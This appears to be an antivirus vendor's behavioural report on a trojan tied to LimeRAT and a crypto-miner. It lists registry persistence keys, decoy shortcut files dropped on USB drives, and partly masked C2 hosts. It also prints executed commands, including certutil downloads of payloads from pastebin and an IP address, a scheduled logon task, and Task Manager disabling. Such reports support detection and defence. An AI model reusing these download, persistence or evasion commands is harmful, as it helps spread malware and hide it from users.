Trojan.Siggen18.34345

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[<HKCU>\software\microsoft\windows\currentversion\run] 'main' = '"%APPDATA%\AppData\Flash Player\\main.vbs"'
[<HKLM>\software\microsoft\windows\currentversion\run] 'main' = '"%APPDATA%\AppData\Flash Player\\main.vbs"'
[<HKCU>\software\microsoft\windows\currentversion\run] 'backup' = '"%APPDATA%\AppData\Flash Player\\backup.vbs"'
[<HKLM>\software\microsoft\windows\currentversion\run] 'backup' = '"%APPDATA%\AppData\Flash Player\\backup.vbs"'
[<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Windows Logons' = '%WINDIR% (x86)\explorer.exe'
[<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Windows Updates' = '%APPDATA%\AppData\Windows Updates\winupdate.exe'

Creates or modifies the following files

%APPDATA%\microsoft\windows\start menu\programs\startup\main.vbs
%APPDATA%\microsoft\windows\start menu\programs\startup\backup.vbs
%APPDATA%\microsoft\windows\start menu\programs\startup\microsoft.exe
<SYSTEM32>\tasks\limerat-admin

Creates the following files on removable media

<Drive name for removable media>:\backup.vbs
<Drive name for removable media>:\roozenedowebinar.lnk
<Drive name for removable media>:\iso27k_isms_implementation_and_certification_process_overview_v2.lnk
<Drive name for removable media>:\gruenspecht_02172016.lnk
<Drive name for removable media>:\middaugh_keynote.lnk
<Drive name for removable media>:\metac.lnk
<Drive name for removable media>:\ksearch_esa_talk.lnk
<Drive name for removable media>:\writingcompletesarnarrative_1103.lnk
<Drive name for removable media>:\ppswamp.lnk
<Drive name for removable media>:\bg_search_box.lnk
<Drive name for removable media>:\arrow-down.lnk
<Drive name for removable media>:\dissolveanother.lnk
<Drive name for removable media>:\block.lnk
<Drive name for removable media>:\background.lnk
<Drive name for removable media>:\tunpersonalca1.lnk
<Drive name for removable media>:\cert.lnk
<Drive name for removable media>:\systisoft.lnk
<Drive name for removable media>:\hhhlcert.lnk
<Drive name for removable media>:\delongcacert.lnk
<Drive name for removable media>:\ck_ugo.lnk
<Drive name for removable media>:\lom602.lnk
<Drive name for removable media>:\bc01.lnk
<Drive name for removable media>:\2015-02-patients-topic-work-related-asthma-jobs.lnk
<Drive name for removable media>:\video.lnk
<Drive name for removable media>:\indogerman2010.lnk
<Drive name for removable media>:\swc_2009-03-02.lnk
<Drive name for removable media>:\backup.lnk
<Drive name for removable media>:\taxus_baccata.lnk
<Drive name for removable media>:\productos.lnk
<Drive name for removable media>:\removedtitles_records.lnk
<Drive name for removable media>:\contractualdeadlines.lnk
<Drive name for removable media>:\national_autism_preparation_programs.lnk
<Drive name for removable media>:\al.lnk
<Drive name for removable media>:\2013_smccc_competition_points_jul2013.lnk
<Drive name for removable media>:\highly_cited_2001.lnk
<Drive name for removable media>:\suspendedcompanies.lnk
<Drive name for removable media>:\guide_reorganization_mapping.lnk
<Drive name for removable media>:\price030215.lnk
<Drive name for removable media>:\calculatorworksheet.lnk
<Drive name for removable media>:\1sm_price.lnk
<Drive name for removable media>:\passport_pal.lnk
<Drive name for removable media>:\flower_trans_matte.lnk
<Drive name for removable media>:\krsweden.lnk
<Drive name for removable media>:\phytoremediation.lnk
<Drive name for removable media>:\pandp.lnk
<Drive name for removable media>:\router_manual.lnk
<Drive name for removable media>:\waterlandhealthkano.lnk
<Drive name for removable media>:\static_electricity_easy_and_quick_activities.lnk
<Drive name for removable media>:\fungalnameauthors.lnk
<Drive name for removable media>:\contenttypes.lnk
<Drive name for removable media>:\sioc.lnk
<Drive name for removable media>:\clip_480_5sec_6mbps_h264.lnk
<Drive name for removable media>:\foaf.lnk
<Drive name for removable media>:\51.lnk
<Drive name for removable media>:\issi2013_template_for_posters.lnk
<Drive name for removable media>:\aoc_saq_d_v3_merchant.lnk
<Drive name for removable media>:\glidescope_review_rev_010.lnk
<Drive name for removable media>:\hadac_newsletter_july_2010_final.lnk
<Drive name for removable media>:\lisp_success.lnk
<Drive name for removable media>:\february_catalogue__2015.lnk
<Drive name for removable media>:\cveuropeo.lnk
<Drive name for removable media>:\ovp25012015.lnk
<Drive name for removable media>:\applicantform_en.lnk
<Drive name for removable media>:\508softwareandos.lnk
<Drive name for removable media>:\sdksampleprivdeveloper.lnk
<Drive name for removable media>:\contosoroot_1.lnk
<Drive name for removable media>:\testcertificate.lnk
<Drive name for removable media>:\contoso_1.lnk
<Drive name for removable media>:\default.lnk
<Drive name for removable media>:\dial.lnk
<Drive name for removable media>:\toolbar.lnk
<Drive name for removable media>:\dashborder_96.lnk
<Drive name for removable media>:\main.vbs
<Drive name for removable media>:\dashborder_192.lnk
<Drive name for removable media>:\dashborder_144.lnk
<Drive name for removable media>:\split.lnk
<Drive name for removable media>:\delete.lnk
<Drive name for removable media>:\correct.lnk
<Drive name for removable media>:\nwfieldnotes1966.lnk
<Drive name for removable media>:\file_p_00000000_1371597592.lnk
<Drive name for removable media>:\spanner.lnk
<Drive name for removable media>:\thlps_keeper_mayer_1965.lnk
<Drive name for removable media>:\pushkin.lnk
<Drive name for removable media>:\2.lnk
<Drive name for removable media>:\3.lnk
<Drive name for removable media>:\4f0bf7ff71f28.lnk
<Drive name for removable media>:\210252809.lnk
<Drive name for removable media>:\168.lnk
<Drive name for removable media>:\1189.lnk
<Drive name for removable media>:\about.lnk
<Drive name for removable media>:\howto-index.lnk
<Drive name for removable media>:\adadsi.lnk
<Drive name for removable media>:\api-hashmap.lnk
<Drive name for removable media>:\browse.lnk
<Drive name for removable media>:\ituneshelpunavailable.lnk
<Drive name for removable media>:\advice_process.lnk
<Drive name for removable media>:\iisstart.lnk
<Drive name for removable media>:\trivial-merge.lnk
<Drive name for removable media>:\utorrent.lnk
<Drive name for removable media>:\notepad.lnk
<Drive name for removable media>:\calc.lnk
<Drive name for removable media>:\chromesetup.lnk
<Drive name for removable media>:\tcm851ax32.lnk
<Drive name for removable media>:\skypesetup.lnk
<Drive name for removable media>:\adhd_and_obesity.lnk
<Drive name for removable media>:\etc6_m_1.lnk
<Drive name for removable media>:\main.lnk

Malicious functions

To complicate detection of its presence in the operating system,

blocks execution of the following system utilities:

Windows Task Manager (Taskmgr)

Executes the following

'<SYSTEM32>\taskkill.exe' /IM taskmgr.exe /F
'<SYSTEM32>\taskkill.exe' /IM xmrig.exe /F

Modifies file system

Creates the following files

%TEMP%\d133.tmp\d134.bat
%APPDATA%\appdata\flash player\main.vbs
%APPDATA%\appdata\flash player\backup.vbs
%TEMP%\8dec.tmp\8e2c.bat
%TEMP%\updatew\main.vbs
%TEMP%\updatew\clsio.vbs
%TEMP%\updatew\backup.vbs
%APPDATA%\appdata\windows updates\winupdate.exe
%TEMP%\updatew\windowsapp.exe
%TEMP%\updatew\winlogon.exe
%TEMP%\updatew\microsoft.exe
%TEMP%\ie.exe
%TEMP%\windowscheck_182352115_log.bat
%TEMP%\veriu.bat
%TEMP%\dd_vcredist_windows_check_31029441313.log
%TEMP%\updatew\winupdate.exe
%APPDATA%\appdata\windows protector\winlogon.exe

Sets the 'hidden' attribute to the following files

%APPDATA%\appdata\flash player\backup.vbs
%APPDATA%\appdata\flash player\main.vbs
<Drive name for removable media>:\backup.vbs
<Drive name for removable media>:\main.vbs
%APPDATA%\appdata\windows updates\winupdate.exe

Deletes the following files

%TEMP%\veriu.bat
%TEMP%\windowscheck_182352115_log.bat
%TEMP%\d133.tmp\d134.bat
%TEMP%\updatew\backup.vbs
%TEMP%\updatew\main.vbs
%TEMP%\updatew\winlogon.exe
%APPDATA%\microsoft\windows\start menu\programs\startup\backup.vbs
%APPDATA%\microsoft\windows\start menu\programs\startup\main.vbs
%TEMP%\updatew\microsoft.exe
%TEMP%\updatew\winupdate.exe

Substitutes the following files

%TEMP%\veriu.bat

Network activity

Connects to

'pa###bin.com':443
'microsoft.com':80
'54.##4.238.33':8380
'nv####der.mooo.com':18632
'nv####der.mooo.com':16029

TCP

HTTP GET requests

http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
http://54.###.238.33:8380/IE.exe via 54.##4.238.33

Other

'pa###bin.com':443

UDP

DNS ASK pa###bin.com
DNS ASK microsoft.com
DNS ASK nv####der.mooo.com
DNS ASK uk####8425.ddns.net
DNS ASK uk#####425.ddnsking.com
DNS ASK uk######25.3utilities.com
DNS ASK uk#####425.bounceme.net
DNS ASK uk#######5.freedynamicdns.net

Miscellaneous

Searches for the following windows

ClassName: 'EDIT' WindowName: ''
ClassName: '' WindowName: ''

Creates and executes the following

'%TEMP%\ie.exe'
'%TEMP%\updatew\windowsapp.exe'
'%TEMP%\updatew\winlogon.exe'
'%APPDATA%\appdata\windows protector\winlogon.exe'
'<SYSTEM32>\cmd.exe' /c "%TEMP%\D133.tmp\D134.bat <Full path to file>"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "%TEMP%\8DEC.tmp\8E2C.bat %TEMP%\updateW\windowsapp.exe"' (with hidden window)
'%WINDIR%\syswow64\schtasks.exe' /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'%APPDATA%\AppData\Windows Protector\winlogon.exe'"' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /c "%TEMP%\D133.tmp\D134.bat <Full path to file>"
'<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\AppData"
'<SYSTEM32>\wbem\wmic.exe' process where name='Microsoft.exe' delete
'<SYSTEM32>\wbem\wmic.exe' process where name='winupdate.exe' delete
'<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "%WINDIR% (x86)\explorer.exe"
'<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "%APPDATA%\AppData\Windows Updates\winupdate.exe"
'<SYSTEM32>\attrib.exe' -s -h "%APPDATA%\AppData\Windows Updates"
'<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\AppData\Windows Protector\*.*"
'<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\AppData\Windows Protector"
'<SYSTEM32>\attrib.exe' -s -h "%APPDATA%\AppData\Windows Updates\*.*"
'<SYSTEM32>\xcopy.exe' "%TEMP%\updateW\Microsoft.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
'<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\AppData\Windows Updates\*.*"
'<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\AppData\Windows Updates"
'<SYSTEM32>\wbem\wmic.exe' process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
'<SYSTEM32>\wbem\wmic.exe' process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
'<SYSTEM32>\attrib.exe' -s -h "%WINDIR% (x86)\*.*"
'<SYSTEM32>\attrib.exe' -s -h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
'<SYSTEM32>\xcopy.exe' "%TEMP%\updateW\winupdate.exe" "%APPDATA%\AppData\Windows Updates" /K /D /H /Y
'<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\AppData\Flash Player\"
'<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\AppData\Flash Player\*.*"
'<SYSTEM32>\wscript.exe' "%APPDATA%\AppData\Flash Player\main.vbs"
'<SYSTEM32>\find.exe' /c "ECHO OK" "%TEMP%\VERIU.BAT"
'<SYSTEM32>\cmd.exe' /c del "<Current directory>\"%TEMP%\VERIU.BAT""
'<SYSTEM32>\wbem\wmic.exe' process where name='taskmgr.exe' delete
'<SYSTEM32>\wbem\wmic.exe' process where name='xmrig.exe' delete
'<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
'<SYSTEM32>\certutil.exe' -urlcache -split -f https://pastebin.com/raw/03Gje1tb "%TEMP%\windowscheck_182352115_log.bat"
'<SYSTEM32>\find.exe' /c "set active" "%TEMP%\windowscheck_182352115_log.bat"
'<SYSTEM32>\certutil.exe' -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "%TEMP%\VERIU.BAT"
'<SYSTEM32>\certutil.exe' -urlcache -split -f "http://54.###.238.33:8380/IE.exe" %TEMP%\IE.exe
'<SYSTEM32>\cmd.exe' /c "%TEMP%\8DEC.tmp\8E2C.bat %TEMP%\updateW\windowsapp.exe"
'<SYSTEM32>\cmd.exe' /c del "%TEMP%\updateW\"%TEMP%\VERIU.BAT""
'<SYSTEM32>\attrib.exe' -s -h "%APPDATA%\AppData\Flash Player\*.*"
'<SYSTEM32>\attrib.exe' -s -h "%APPDATA%\AppData\Flash Player\"
'<SYSTEM32>\xcopy.exe' "%TEMP%\updateW\backup.vbs" "%APPDATA%\AppData\Flash Player" /K /D /H /Y
'<SYSTEM32>\xcopy.exe' "%TEMP%\updateW\main.vbs" "%APPDATA%\AppData\Flash Player" /K /D /H /Y
'<SYSTEM32>\wscript.exe' "%APPDATA%\AppData\Flash Player\backup.vbs"
'<SYSTEM32>\cmd.exe' /c del "<Current directory>\"%TEMP%\windowscheck_182352115_log.bat""
'<SYSTEM32>\certutil.exe' -urlcache -split -f "http://54.###.238.33:8380/xm/win.com" "%TEMP%\updateW\win.com"
'%WINDIR%\syswow64\schtasks.exe' /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'%APPDATA%\AppData\Windows Protector\winlogon.exe'"

Technologies

Begriffe

Schulung und Training

Mythen

Technical Information

Curing recommendations

Free trial